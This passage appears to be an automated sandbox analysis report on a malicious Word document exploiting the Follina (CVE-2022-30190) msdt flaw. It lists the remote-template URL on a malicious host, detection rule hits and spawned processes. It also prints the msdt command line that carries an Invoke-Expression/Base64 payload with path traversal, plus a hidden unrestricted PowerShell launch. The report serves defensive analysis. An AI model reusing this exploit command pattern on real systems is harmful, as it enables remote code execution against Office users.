Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://graph.ppe.windows.net
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://graph.ppe.windows.net/
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://graph.windows.net
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://graph.windows.net/
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://incidents.diagnostics.office.com
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://invites.office.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://lifecycle.office.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://login.microsoftonline.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://login.windows.local
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://management.azure.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://management.azure.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://messaging.action.office.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://messaging.engagement.office.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://messaging.office.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://ncus.contentsync.
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://ncus.pagecontentsync.
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://officeapps.live.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://onedrive.live.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://onedrive.live.com/embed?
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://osi.office.net
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://otelrules.azureedge.net
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://outlook.office.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://outlook.office.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://outlook.office365.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://outlook.office365.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://pages.store.office.com/review/query
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://powerlift.acompli.net
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://roaming.edog.
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://settings.outlook.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://shell.suite.office.com:1443
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://skyapi.live.net/Activity/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://staging.cortana.ai
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://store.office.cn/addinstemplate
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://store.office.de/addinstemplate
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://tasks.office.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
            Source: ~WRS{EC60D62E-A2BB-4EAD-A7F3-2736EF3773E3}.tmp.0.drString found in binary or memory: https://upgrade.4nmn.com/microsoft.html
            Source: unknownDNS traffic detected: queries for: upgrade.4nmn.com
            Source: global trafficHTTP traffic detected: GET /microsoft.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: upgrade.4nmn.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /microsoft.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: upgrade.4nmn.comIf-Modified-Since: Sat, 18 Jun 2022 06:13:07 GMTIf-None-Match: "b0474a7ada82d81:0"Connection: Keep-Alive
            Source: unknownHTTPS traffic detected: 116.203.251.9:443 -> 192.168.2.3:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 116.203.251.9:443 -> 192.168.2.3:49745 version: TLS 1.2

            System Summary

            Source: document.xml.rels, type: SAMPLEMatched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen
            Source: amsi32_1320.amsi.csv, type: OTHERMatched rule: Recon_Commands_Windows_Gen1 date = 2017-07-10, author = Florian Roth, description = Detects a set of reconnaissance commands on Windows systems, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://goo.gl/MSJCxP
            Source: document.xml.rels, type: SAMPLEMatched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
            Source: 00000007.00000002.527146475.0000000000810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
            Source: 00000007.00000002.530154315.0000000000930000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
            Source: 00000007.00000002.527356593.0000000000818000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
            Source: 00000019.00000003.452130269.0000000003572000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Recon_Commands_Windows_Gen1 date = 2017-07-10, author = Florian Roth, description = Detects a set of reconnaissance commands on Windows systems, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://goo.gl/MSJCxP
            Source: 00000007.00000002.530232079.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
            Source: Process Memory Space: msdt.exe PID: 7052, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
            Source: Process Memory Space: powershell.exe PID: 1320, type: MEMORYSTRMatched rule: Recon_Commands_Windows_Gen1 date = 2017-07-10, author = Florian Roth, description = Detects a set of reconnaissance commands on Windows systems, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://goo.gl/MSJCxP
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\microsoft[1].htm, type: DROPPEDMatched rule: SUSP_obfuscated_JS_obfuscatorio date = 2021-08-25, author = @imp0rtp3, description = Detect JS obfuscation done by the js obfuscator (often malicious), reference = https://obfuscator.io, score =
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\14E38085.htm, type: DROPPEDMatched rule: SUSP_obfuscated_JS_obfuscatorio date = 2021-08-25, author = @imp0rtp3, description = Detect JS obfuscation done by the js obfuscator (often malicious), reference = https://obfuscator.io, score =
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7BB121F.htm, type: DROPPEDMatched rule: SUSP_obfuscated_JS_obfuscatorio date = 2021-08-25, author = @imp0rtp3, description = Detect JS obfuscation done by the js obfuscator (often malicious), reference = https://obfuscator.io, score =
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\5db65c7.ps1
            Source: DiagPackage.dll.mui.7.drStatic PE information: No import functions for PE file found
            Source: DiagPackage.dll.7.drStatic PE information: No import functions for PE file found
            Source: DiagPackage.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: DiagPackage.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: DiagPackage.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXESection loaded: sfc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
            Source: WF0SlQWKr1.docxVirustotal: Detection: 20%
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'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'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qghxibcc\qghxibcc.cmdline
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD7B.tmp" "c:\Users\user\AppData\Local\Temp\qghxibcc\CSC6B59943BD49B40F0B0C17D73652F0B2.TMP"
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\53i2jeo5\53i2jeo5.cmdline
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC028.tmp" "c:\Users\user\AppData\Local\Temp\53i2jeo5\CSCF157ADCDF084F15A343B1EBC149E5EE.TMP"
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Unrestricted -File C:/Windows/Temp/5db65c7.ps1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\05d3mwhu\05d3mwhu.cmdline
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES753.tmp" "c:\Users\user\AppData\Local\Temp\05d3mwhu\CSC34F94DCCCDC94BCAA3A860A33C1ABBE2.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /all
            Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
            Source: WF0SlQWKr1.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\WF0SlQWKr1.docx
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_processor
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{522C899F-291C-46FB-9B7D-26142961A6D7} - OProcSessId.dat
            Source: classification engineClassification label: mal100.expl.evad.winDOCX@18/44@2/1
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_01
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\msdt.exe | Automated click: Next
            Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll

            Data Obfuscation

            Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Unrestricted -File C:/Windows/Temp/5db65c7.ps1
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qghxibcc\qghxibcc.cmdline
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\53i2jeo5\53i2jeo5.cmdline
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\05d3mwhu\05d3mwhu.cmdline

            Persistence and Installation Behavior

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /all
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\qghxibcc\qghxibcc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\53i2jeo5\53i2jeo5.dll
